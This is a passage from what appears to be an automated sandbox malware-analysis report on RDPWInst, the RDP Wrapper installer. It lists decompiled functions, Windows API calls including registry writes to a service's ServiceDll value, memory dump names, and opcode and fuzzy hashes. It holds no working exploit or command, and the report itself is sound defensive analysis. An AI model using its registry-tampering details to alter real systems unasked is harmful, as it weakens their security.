                                                                                • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                                                • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                                                Function 0040941C Relevance: 6.1, APIs: 4, Instructions: 118stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                • String ID:
                                                                                • API String ID: 3749826553-0
                                                                                • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                                                • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                                                Function 004040B4 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID: $zD$xPD
                                                                                • API String ID: 1263568516-535612291
                                                                                • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                                                • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                                                Function 00438B0C Relevance: 4.6, APIs: 3, Instructions: 150registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                Function 00406220 Relevance: 4.6, APIs: 3, Instructions: 79threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                Function 00406218 Relevance: 4.6, APIs: 3, Instructions: 76threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                Function 0040621C Relevance: 4.6, APIs: 3, Instructions: 74threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                Function 00402990 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 38memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: $zD$$zD
                                                                                • API String ID: 4275171209-354537599
                                                                                • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                Function 004069D4 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 986138563-0
                                                                                • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                Function 004398F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: ImagePath
                                                                                • API String ID: 3660427363-1008103227
                                                                                • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                Function 004399A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: $sD
                                                                                • API String ID: 71445658-3047594130
                                                                                • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                Function 0043987C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: ServiceDll
                                                                                • API String ID: 3702945584-3252591312
                                                                                • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                Function 00439D1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
